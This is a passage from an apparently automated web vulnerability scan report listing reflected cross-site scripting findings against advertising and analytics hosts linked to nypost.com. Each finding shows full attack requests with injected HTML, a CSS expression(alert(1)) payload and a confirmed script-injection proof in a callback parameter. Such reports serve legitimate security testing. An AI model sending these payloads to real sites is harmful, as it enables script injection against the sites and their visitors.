User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=utf-8
Expires: Sat, 27 Nov 2010 20:33:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:00 GMT
Vary: Host
Server: Microsoft-IIS/7.5
Set-Cookie: AProfile=tsHwCZzNSV+W7b9EmVkHefNppQo=; expires=Mon, 26-Nov-2040 20:33:00 GMT; path=/epaper/
X-AspNet-Version: 4.0.30319
wc: 1
Date: Fri, 26 Nov 2010 20:32:59 GMT
Connection: close
Content-Length: 15938


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><script type="text/javascript">
window.NDScriptsVers
...[SNIP]...
<a title="Overview" href="/epaper/helpandsupport.aspx?subpage=PressdisplayOverview&a253b"style="x:expression(alert(1))"7663e53443=1">
...[SNIP]...

1.99. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3e105<a>33f0a8af8c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3e105<a>33f0a8af8c1=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:32 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3e105<a>33f0a8af8c1=1/AdServerService.asmx" />
...[SNIP]...

1.100. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload e9c61<a>9670bb58e0a was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252e9c61<a>9670bb58e0a HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:31 GMT
Content-Length: 1907
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252e9c61<a>9670bb58e0a/AdServerService.asmx" />
...[SNIP]...

1.101. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 499b3<a>dcd1813efb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&499b3<a>dcd1813efb4=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:06 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&499b3<a>dcd1813efb4=1/ChannelInfoService.asmx" />
...[SNIP]...

1.102. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 55e32<a>b0a7e7053a6 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325255e32<a>b0a7e7053a6 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:05 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325255e32<a>b0a7e7053a6/ChannelInfoService.asmx" />
...[SNIP]...

1.103. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86602<a>17f7a325ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&86602<a>17f7a325ea4=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:36 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&86602<a>17f7a325ea4=1/ClipInfoService.asmx" />
...[SNIP]...

1.104. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 1f67b<a>4080466a88e was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132521f67b<a>4080466a88e HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:34 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132521f67b<a>4080466a88e/ClipInfoService.asmx" />
...[SNIP]...

1.105. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eca17<a>d5af7663947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&eca17<a>d5af7663947=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:35 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&eca17<a>d5af7663947=1/ErrorInfoService.asmx" />
...[SNIP]...

1.106. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4a37d<a>1d8010bbad2 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524a37d<a>1d8010bbad2 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:32 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524a37d<a>1d8010bbad2/ErrorInfoService.asmx" />
...[SNIP]...

1.107. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f0c3f<a>b85df024540 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&f0c3f<a>b85df024540=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:06 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&f0c3f<a>b85df024540=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.108. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 90605<a>9c366260d50 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325290605<a>9c366260d50 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:05 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325290605<a>9c366260d50/PlaylistInfoService.asmx" />
...[SNIP]...

1.109. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3c8c7<a>6613c325b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3c8c7<a>6613c325b13=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:34 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3c8c7<a>6613c325b13=1/RSSService.asmx" />
...[SNIP]...

1.110. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4e1f6<a>5758be85cbc was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524e1f6<a>5758be85cbc HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:32 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524e1f6<a>5758be85cbc/RSSService.asmx" />
...[SNIP]...

1.111. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload de428<a>8a3413ae47b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&de428<a>8a3413ae47b=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:36 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&de428<a>8a3413ae47b=1/RatingService.asmx" />
...[SNIP]...

1.112. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 99e97<a>0a8fa2f50b9 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325299e97<a>0a8fa2f50b9 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:31 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325299e97<a>0a8fa2f50b9/RatingService.asmx" />
...[SNIP]...

1.113. http://rt.sitebrand.com/main.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 60647<script>alert(1)</script>0bdac1d23ec was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.php?callback=jsonp129080571861560647<script>alert(1)</script>0bdac1d23ec&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2F&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=home&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=2&sst=1289175929&spt=1289176036&spd=4&npv=5&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:22:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 261
Connection: keep-alive

